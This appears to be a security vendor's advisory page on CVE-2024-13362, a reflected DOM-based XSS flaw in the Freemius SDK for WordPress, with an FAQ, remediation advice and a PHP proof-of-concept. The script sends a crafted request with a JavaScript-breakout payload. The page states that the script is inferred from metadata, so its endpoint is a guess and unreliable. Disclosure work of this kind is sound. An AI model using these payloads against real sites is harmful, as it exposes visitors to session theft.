What is CVE-2024-13362?

CVE-2024-13362 is a reflected DOM-based cross-site scripting (XSS) vulnerability affecting the Freemius SDK versions up to 2.10.1. It allows unauthenticated attackers to inject arbitrary web scripts via the ‘url’ parameter, which can execute in the context of the victim’s browser.

How can I check if my site is vulnerable?

To check if your site is vulnerable, verify the version of the Freemius SDK and the associated plugins. If you are using version 2.10.1 or earlier, your site may be at risk for this vulnerability.

What does a CVSS score of 6.1 mean?

A CVSS score of 6.1 indicates a medium severity level for this vulnerability. This means that while exploitation requires user interaction, it still poses a significant risk, particularly to site visitors who may be tricked into clicking malicious links.

How does the exploitation of this vulnerability work?

Exploitation involves an attacker crafting a malicious URL that includes a payload in the ‘url’ parameter. When a victim clicks this link, the injected JavaScript executes in their browser, potentially allowing the attacker to steal cookies or perform actions on behalf of the user.

What are the recommended remediation steps?

To remediate this vulnerability, implement proper output encoding for the ‘url’ parameter in JavaScript contexts. Use functions like esc_js() and esc_url_raw() to sanitize input and ensure that user input is not directly passed into DOM manipulation methods.

Is there a patch available for this vulnerability?

As of now, there is no patched version available for the Freemius SDK that addresses CVE-2024-13362. Site administrators are advised to monitor for updates and consider alternative solutions until a fix is released.

What are the risks of this vulnerability?

The risks include arbitrary script execution in the victim’s browser, which can lead to session hijacking, unauthorized actions, or redirection to malicious sites. Since the attack requires user interaction, it may be less likely but still poses a significant threat.

How does the proof of concept demonstrate the issue?

The proof of concept illustrates how an attacker can construct a URL that exploits the vulnerability by injecting a JavaScript payload. It shows how the ‘url’ parameter can be manipulated to execute arbitrary code when the victim interacts with the crafted link.

What should I do if I am affected?

If you are affected, immediately review your plugin versions and consider disabling the vulnerable plugins. Implement the recommended remediation steps and stay informed about updates from the plugin developers.

Can this vulnerability be exploited without user interaction?

No, this vulnerability requires user interaction to exploit. An attacker must trick the user into clicking a crafted link, which makes it less severe compared to vulnerabilities that can be exploited without user action.

What is reflected DOM-based XSS?

Reflected DOM-based XSS occurs when an attacker injects malicious scripts into a web page via parameters in the URL, which are then executed by the browser. This type of XSS does not involve persistent storage and relies on immediate user interaction for execution.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : May 9, 2026

CVE-2024-13362: Freemius <= 2.10.1 – Reflected DOM-Based Cross-Site Scripting via url Parameter (premmerce-woocommerce-product-filter)

Q: Who is affected by this vulnerability?

WordPress sites using the Freemius SDK version 2.10.1 or earlier, particularly those utilizing the premmerce-woocommerce-product-filter plugin version 3.7.3, are affected. Site administrators should check their plugin versions to determine if they are at risk.

CVE ID CVE-2024-13362

Plugin premmerce-woocommerce-product-filter

Severity Medium (CVSS 6.1)

CWE 79

Vulnerable Version 3.7.3

Patched Version —

Disclosed April 29, 2026

Analysis Overview

Atomic Edge analysis of CVE-2024-13362 (metadata-based): This is a reflected DOM-based cross-site scripting (XSS) vulnerability in Freemius SDK versions up to 2.10.1, affecting multiple WordPress plugins and themes including the premmerce-woocommerce-product-filter plugin version 3.7.3. The vulnerability has a CVSS score of 6.1 (Medium) and requires user interaction through a crafted link. No patched version is available.

The root cause, inferred from the CWE-79 classification and description, is improper sanitization of the url parameter in Freemius SDK components. The description states insufficient input sanitization and output escaping leads to reflected XSS. The DOM-based nature suggests JavaScript manipulates the document object model using attacker-controlled data from the url parameter without proper encoding. This conclusion is inferred from metadata, as no code diff is available.

Exploitation requires an attacker to craft a malicious URL targeting a Freemius callback or redirect endpoint. The url parameter passes through insufficiently escaped JavaScript code. The attacker delivers the link via phishing or other social engineering. When the victim clicks the crafted URL, the malicious JavaScript executes in the browser context of the vulnerable WordPress site. A typical attack URL would be: http://target.com/?freemius_redirect=1&url=javascript:alert(‘XSS’) or similar DOM XSS payloads that break out of a script context.

Remediation requires implementing proper output encoding for the url parameter when it appears in JavaScript contexts. The fix must apply esc_js() before echoing the parameter into script blocks, or avoid passing raw user input into DOM manipulation methods like innerHTML, document.write, or eval. Input sanitization using esc_url_raw() and output escaping with esc_url() for href attributes is also necessary. Since no patch exists, updating to a future Freemius SDK version is advised.

Impact includes arbitrary script execution in the victim’s browser session. An attacker can steal session cookies, perform actions as the logged-in user, deface the page, or redirect to malicious sites. Since the attack targets DOM manipulation, it can bypass many server-side XSS filters if the vulnerable code runs in the browser after page load. The attack requires user interaction, reducing severity but still posing a significant risk to site visitors.

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2024-13362 - Freemius <= 2.10.1 - Reflected DOM-Based Cross-Site Scripting via url Parameter

// Assumptions:
// - Target site has a plugin or theme using Freemius SDK 2.10.1 or earlier
// - The vulnerable endpoint is triggered via a GET request with 'freemius_redirect' and 'url' parameters
// - The 'url' parameter is reflected into a JavaScript context without proper escaping

$target_url = 'http://example.com'; // Change this to the target WordPress site URL

// Payload: Attempt to break out of a JavaScript string or variable assignment
// Common pattern: Freemius checkouts or redirects use: var redirectUrl = 'USER_INPUT';
$xss_payload = "';alert('XSS');//";
$malicious_url = $target_url . '/?freemius_redirect=1&url=' . urlencode($xss_payload);

echo "[+] Atomic Edge PoC for CVE-2024-13362n";
echo "[+] Target: $target_urln";
echo "[+] Sending crafted request...n";

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $malicious_url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36');

$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);

echo "[+] HTTP Response Code: $http_coden";

// Check if the payload appears in the response (as an indicator)
if (strpos($response, $xss_payload) !== false) {
    echo "[!] The payload appears to be reflected in the response. The site may be vulnerable.n";
    echo "[!] Manual verification required: Visit the generated URL in a browser.n";
} else {
    echo "[-] Payload not found in response. The site may not be vulnerable, or the endpoint differs.n";
}

echo "[+] Generated malicious URL for manual testing: $malicious_urln";

Frequently Asked Questions

What is CVE-2024-13362?
Understanding the vulnerability
CVE-2024-13362 is a reflected DOM-based cross-site scripting (XSS) vulnerability affecting the Freemius SDK versions up to 2.10.1. It allows unauthenticated attackers to inject arbitrary web scripts via the ‘url’ parameter, which can execute in the context of the victim’s browser.
Who is affected by this vulnerability?
Identifying vulnerable installations
WordPress sites using the Freemius SDK version 2.10.1 or earlier, particularly those utilizing the premmerce-woocommerce-product-filter plugin version 3.7.3, are affected. Site administrators should check their plugin versions to determine if they are at risk.
How can I check if my site is vulnerable?
Steps for verification
To check if your site is vulnerable, verify the version of the Freemius SDK and the associated plugins. If you are using version 2.10.1 or earlier, your site may be at risk for this vulnerability.
What does a CVSS score of 6.1 mean?
Understanding the severity rating
A CVSS score of 6.1 indicates a medium severity level for this vulnerability. This means that while exploitation requires user interaction, it still poses a significant risk, particularly to site visitors who may be tricked into clicking malicious links.
How does the exploitation of this vulnerability work?
Mechanics of the attack
Exploitation involves an attacker crafting a malicious URL that includes a payload in the ‘url’ parameter. When a victim clicks this link, the injected JavaScript executes in their browser, potentially allowing the attacker to steal cookies or perform actions on behalf of the user.
What are the recommended remediation steps?
Fixing the vulnerability
To remediate this vulnerability, implement proper output encoding for the ‘url’ parameter in JavaScript contexts. Use functions like esc_js() and esc_url_raw() to sanitize input and ensure that user input is not directly passed into DOM manipulation methods.
Is there a patch available for this vulnerability?
Current status of remediation
As of now, there is no patched version available for the Freemius SDK that addresses CVE-2024-13362. Site administrators are advised to monitor for updates and consider alternative solutions until a fix is released.
What are the risks of this vulnerability?
Potential impacts on users
The risks include arbitrary script execution in the victim’s browser, which can lead to session hijacking, unauthorized actions, or redirection to malicious sites. Since the attack requires user interaction, it may be less likely but still poses a significant threat.
How does the proof of concept demonstrate the issue?
Understanding the PoC
The proof of concept illustrates how an attacker can construct a URL that exploits the vulnerability by injecting a JavaScript payload. It shows how the ‘url’ parameter can be manipulated to execute arbitrary code when the victim interacts with the crafted link.
What should I do if I am affected?
Immediate actions to take
If you are affected, immediately review your plugin versions and consider disabling the vulnerable plugins. Implement the recommended remediation steps and stay informed about updates from the plugin developers.
Can this vulnerability be exploited without user interaction?
Nature of the attack
No, this vulnerability requires user interaction to exploit. An attacker must trick the user into clicking a crafted link, which makes it less severe compared to vulnerabilities that can be exploited without user action.
What is reflected DOM-based XSS?
Defining the attack vector
Reflected DOM-based XSS occurs when an attacker injects malicious scripts into a web page via parameters in the URL, which are then executed by the browser. This type of XSS does not involve persistent storage and relies on immediate user interaction for execution.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations